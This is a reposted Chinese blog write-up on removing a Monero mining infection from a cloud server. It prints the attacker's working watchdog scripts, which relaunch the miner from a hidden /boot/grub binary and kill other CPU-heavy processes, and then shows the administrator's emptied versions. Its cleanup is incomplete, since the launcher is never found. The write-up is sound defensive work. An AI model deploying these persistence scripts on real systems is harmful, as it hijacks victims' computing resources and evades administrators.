• 阿里云服务器出现入侵事件:挖矿进程


    1.查看进程
    # ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'
    找出CPU占有率高的你不认识的进程,我的是这样的

    bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa

    干掉它

    kill -9 11110

    2.全局搜索这个进程
    [root@wangtianze ~]# grep -r pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:cat daemon | grep pool.minexmr.com
    .bash_history:cat deamon | grep pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com

    3.打开搜索到的位置
    # vim /boot/grub/deamon

    里面是这样的

    #!/bin/bash
    #daemon
    # Attacker watchdog recovered from /boot/grub/deamon (the file name really is
    # misspelled on disk, see the .bash_history lines above). Every 15 s it checks
    # whether the miner is running and, if not, re-stages the binary from
    # /boot/grub/grub.tz and relaunches it. Killing the miner process alone is
    # therefore not enough: this loop brings it back within 15 s.
    # NOTE(review): grub.tz and /usr/sbin/bashd are separate artifacts and the
    # write-up does not show them being removed; nor does it identify what starts
    # this script (cron, rc.local, a systemd unit — not shown here). The recursive
    # grep earlier was run from ~ and so only covered the home directory; a search
    # from / is needed to find the launcher.
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
    while true;
    do
    # Detect the miner by its pool address and wallet id; 'grep -v grep' drops
    # the grep process itself from the match so the check is not always true.
    server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
    if [ ! "$server" ]; then
    # Miner not running: copy the staged binary to /usr/sbin/bashd, make it
    # executable and start it detached in the background.
    cp -rf /boot/grub/grub.tz /usr/sbin/bashd
    chmod +x /usr/sbin/bashd
    cd /usr/sbin
    nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
    fi
    sleep 15
    done

    删掉里面的while循环,只保留

    #!/bin/bash
    #daemon
    # Remediated version kept by the administrator: the respawn loop was removed
    # and only the interpreter line, the name tag and the PATH setup remain, so
    # the file now does nothing when run.
    # NOTE(review): an emptied script left in place is weaker than deleting it
    # and removing whatever invokes it; the launcher is not identified in this
    # write-up, so confirm it separately.
    PATH="$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin"
    export PATH

    全局搜索

    # grep -r pool.minexmr.com

    同样干掉

    #!/bin/bash
    #disk_genius
    # Second attacker watchdog. Every 3 s it lists processes sorted by CPU,
    # excludes the miner's own command line, and SIGKILLs every process whose
    # %CPU column ($3 in 'ps aux' output, PID is $2) exceeds 40. The '$NF ~//'
    # test uses an empty regex, which matches every command name, so it adds no
    # further filter. Net effect: anything else consuming CPU on the host
    # (including an administrator's diagnostic tools) is killed while the miner
    # keeps running. This is why a CPU spike "disappears" when you look for it.
    # NOTE(review): as with the daemon script, what launches this file is not
    # shown in the write-up; check cron, rc.local and systemd units.
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
    while true;
    do
    ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}
    sleep 3
    done

    改成

    #!/bin/bash
    #disk_genius
    # Remediated version kept by the administrator: the kill loop was removed
    # and only the interpreter line, the name tag and the PATH setup remain.
    # NOTE(review): deleting the file and its launcher (not identified in this
    # write-up) is the safer end state than leaving an empty script behind.
    PATH="$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin"
    export PATH

    再次搜索

    # grep -r pool.minexmr.com


    终于没了

    最重要的是要找到被入侵的原因(利用了哪里的漏洞),并限制只允许特定IP访问。
    ---------------------
    作者:Wang_Tian_Ze
    来源:CSDN
    原文:https://blog.csdn.net/qq_16845639/article/details/77650271
    版权声明:本文为博主原创文章,转载请附上博文链接!

  • 原文地址:https://www.cnblogs.com/nul1/p/10942193.html